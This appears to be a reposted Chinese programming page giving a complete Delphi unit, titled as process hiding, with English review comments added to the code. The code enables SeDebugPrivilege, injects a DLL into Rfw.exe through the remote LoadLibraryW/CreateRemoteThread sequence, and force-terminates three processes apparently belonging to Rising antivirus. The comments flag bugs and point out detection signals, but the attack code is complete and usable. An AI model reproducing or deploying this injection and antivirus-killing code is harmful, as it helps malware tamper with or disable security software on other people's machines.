Delphi 如何在Windows平台下实现进程隐藏


本文整理自网络,侵删。

 unit Unit1;

interface

uses
   Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
   StdCtrls, tlhelp32;
{type
   TProcessEntry32 = record
     dwSize: DWORD;
     cntUsage: DWORD;
     th32ProcessID: DWORD;
     th32DefaultHeapID: DWORD;
     th32ModuleID: DWORD;
     cntThreads: DWORD;
     th32ParentProcessID: DWORD;
     pcPriClassBase: integer;
     dwFlags: DWORD;
     szExeFile: array[0..MAX_PATH - 1] of char;
   end; }
{ Main form. Button1 loads a DLL into another process (see AttachToProcess);
  Button2 terminates a fixed list of processes by name (see Button2Click).
  Both are privileged actions that modify or stop other processes on the host;
  see the review notes on each routine. }
type
   TForm1 = class(TForm)
     Button1: TButton;
     Button2: TButton;
     procedure Button1Click(Sender: TObject);
     procedure Button2Click(Sender: TObject);
   private
     { Terminates the first process whose executable name matches HostFile.
       HostFile is a var parameter although it is never modified, which is
       presumably why Button2Click passes array elements instead of literals. }
     function TerminateAProcess(var HostFile: string):Boolean;
     { Private declarations }
   public
     { Public declarations }
   end;

var
   Form1: TForm1;  { global instance of the main form (created by the project file, not shown here) }

implementation

{$R *.DFM}

{ Looks up a running process by executable name using a Toolhelp snapshot.
  AFilename : name (or path, when PathMatch is True) to look for.
  PathMatch : True compares lppe.szExeFile against AFilename as given;
              False compares only the file-name parts of both.
  ProcessID : receives the PID of the first match, or 0 when nothing matched.
  Review notes:
  - lppe.dwSize is never set before Process32First; the API documents that it
    must be, so the enumeration may fail immediately and ProcessID stays 0.
  - The snapshot handle is not checked against INVALID_HANDLE_VALUE before use.
  - szExeFile normally carries only the image file name, so the PathMatch=True
    branch is unlikely to match a full path -- confirm against intended use.
  - The comparison is case-insensitive (AnsiStricomp). }
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
   lppe: TProcessEntry32;
   SsHandle: Thandle;
   FoundAProc, FoundOK: boolean;
begin
   ProcessID :=0;
   SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);   { snapshot of the process list }
   FoundAProc := Process32First(Sshandle, lppe);
   while FoundAProc do
   begin
     if PathMatch then
       FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
     else
       FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
     if FoundOK then
     begin
       ProcessID := lppe.th32ProcessID;
       break;   { first match wins }
     end;
     FoundAProc := Process32Next(SsHandle, lppe);
   end;
   CloseHandle(SsHandle);
end;

{ Enables or disables SeDebugPrivilege on the current process token.
  bEnabled : True to enable the privilege, False to disable it.
  Returns True when GetLastError is ERROR_SUCCESS after AdjustTokenPrivileges.
  Review notes:
  - The return values of LookupPrivilegeValue and AdjustTokenPrivileges are
    ignored; only GetLastError is consulted. AdjustTokenPrivileges reports
    ERROR_NOT_ALL_ASSIGNED when the privilege is not held by the token, so the
    result is only meaningful for callers that already hold it (administrators).
  - Enabling SeDebugPrivilege is a common precursor to opening processes of
    other users; privilege adjustment on this privilege is a useful audit signal. }
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
   hToken: THandle;
   tp: TOKEN_PRIVILEGES;
   a: DWORD;    { receives the returned length; not used afterwards }
const
   SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
   Result := False;
   if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
   begin
     tp.PrivilegeCount := 1;
     LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
     if bEnabled then
       tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
     else
       tp.Privileges[0].Attributes := 0;
     a := 0;
     AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
     Result := GetLastError = ERROR_SUCCESS;   { see note: does not distinguish "not all assigned" from a real success }
     CloseHandle(hToken);
   end;
end;

{ Loads GuestFile (a DLL path) into another process using the well-known
  remote LoadLibraryW sequence: OpenProcess, VirtualAllocEx,
  WriteProcessMemory, CreateRemoteThread with LoadLibraryW as start routine.
  HostFile  : executable name of the target; resolved with FindAProcess
              (file-name match only) when PID is 0.
  GuestFile : path of the DLL to load inside the target.
  PID       : explicit target PID; 0 means look HostFile up by name.
  Returns the thread handle from CreateRemoteThread, or 0 when the memory
  write failed (or when CreateRemoteThread itself returned 0).
  Security / review notes:
  - This is code injection into another process. Endpoint protection and EDR
    commonly detect exactly this API sequence; it needs SeDebugPrivilege or
    ownership of the target, and HostFile/GuestFile must never come from
    untrusted input.
  - hRemoteProcess is never closed, and the only caller (Button1Click) drops
    the returned thread handle, so both handles leak.
  - No failure checks: OpenProcess may return 0 (for instance when FindAProcess
    found nothing and dwRemoteProcessId is 0), VirtualAllocEx may return nil and
    GetProcAddress may return nil; each result is used unconditionally.
  - The wide-string buffer is allocated with Length(GuestFile)*2+1 bytes, but
    StringToWideChar receives that same number as its WideChar capacity, which
    looks one byte short for the terminator -- confirm. }
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
   hRemoteProcess: THandle;
   dwRemoteProcessId: DWORD;
   cb: DWORD;
   pszLibFileRemote: Pointer;
   iReturnCode: Boolean;
   TempVar: DWORD;
   pfnStartAddr: TFNThreadStartRoutine;
   pszLibAFilename: PwideChar;
begin
   Result := 0;
   EnabledDebugPrivilege(True);   { result ignored; see EnabledDebugPrivilege }
   Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
   StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
   if PID > 0 then
      dwRemoteProcessID := PID
   else
      FindAProcess(HostFile, False, dwRemoteProcessID);   { may leave 0 when not found }
   hRemoteProcess := OpenProcess(PROCESS_Create_THREAD + { allow remote thread creation }
       PROCESS_VM_OPERATION + { allow remote VM operations }
       PROCESS_VM_WRITE, { allow remote VM writes }
       FALSE, dwRemoteProcessId);
   cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);   { byte size of the wide path incl. terminator }
   pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
   TempVar := 0;
   iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
   if iReturnCode then
   begin
     pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
     TempVar := 0;
     Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
   end;
   Freemem(pszLibAFilename);   { hRemoteProcess is not closed here }
end;

{ Button1: loads Project2.dll (located next to this executable) into the
  process named Rfw.exe. The thread handle returned by AttachToProcess is
  discarded, so it leaks; no success or failure is reported to the user. }
procedure TForm1.Button1Click(Sender: TObject);
begin
   AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;

{ Terminates the first running process whose file name matches HostFile.
  HostFile : executable name to look up (declared var, but never modified).
  Returns True unconditionally: a failed TerminateProcess only shows the error
  code via ShowMessage and does not change Result, and "not found" is silent.
  Review notes:
  - The OpenProcess result is not checked and the handle is never closed.
  - bInheritHandle is passed as True, which is not needed for this use.
  - SeDebugPrivilege is enabled before and disabled after the call; the
    enable result is ignored (see EnabledDebugPrivilege for why it is unreliable). }
function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
   HProcessedID:DWORD;
   HProcedss:THandle;
begin
   Result:=True;
   EnabledDebugPrivilege(True);
   FindAProcess(HostFile,False,HProcessedID);   { 0 when no process matches }
   if HProcessedID<>0 then
   begin
     HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
     if not TerminateProcess(HProcedss,0) then
        ShowMessage(IntToStr( GetLastError));
   end;
   EnabledDebugPrivilege(False);
end;

{ Button2: terminates three hard-coded processes by name.
  Security note: the names (Rfw.exe, RavMon.exe, RavTimer.exe) look like
  components of a security product (Rising antivirus/firewall) -- if so, this
  is the "disable the security software" behaviour that defenders and EDR
  rules specifically watch for, not process hiding as the page title suggests.
  Only 3 of the 26 array slots are used; the array is presumably there because
  TerminateAProcess takes a var parameter and cannot accept string literals.
  Return values are ignored (TerminateAProcess always returns True anyway). }
procedure TForm1.Button2Click(Sender: TObject);
var
   FileName:array[0..25] of String;
begin
   FileName[0]:='Rfw.exe';
   FileName[1]:='RavMon.exe';
   FileName[2]:='RavTimer.exe';
   TerminateAProcess(FileName[1]);
   TerminateAProcess(FileName[0]);
   TerminateAProcess(FileName[2]);
end;

end.
